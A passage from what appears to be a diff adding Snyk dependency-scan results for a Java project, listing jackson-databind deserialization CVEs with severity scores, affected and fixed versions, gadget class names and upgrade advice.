"com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T15:03:20.847507Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:24Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.920721Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + 
"className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2642", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.137266Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10969" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-758m-v56v-grj4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T16:25:31.113677Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + 
"level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:31Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.582959Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2662", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.826605Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-rf6r-2c4q-2vwg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T17:09:01.709397Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:20Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:20Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.576513Z", + "socialTrendAlert": false, + 
"severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2670", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-11113", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "cvssSources": [ + { + "type": 
"primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:21.749219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11113" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9vvp-fxw6-jcxr" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T08:36:41.369827Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.400473Z", + "socialTrendAlert": false, + "severityWithCritical": 
"high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2664", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": 
"high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.628835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11111" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-v3xw-c963-f5hc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:28:18.821103Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.145935Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", + "title": "GItHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2666", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + 
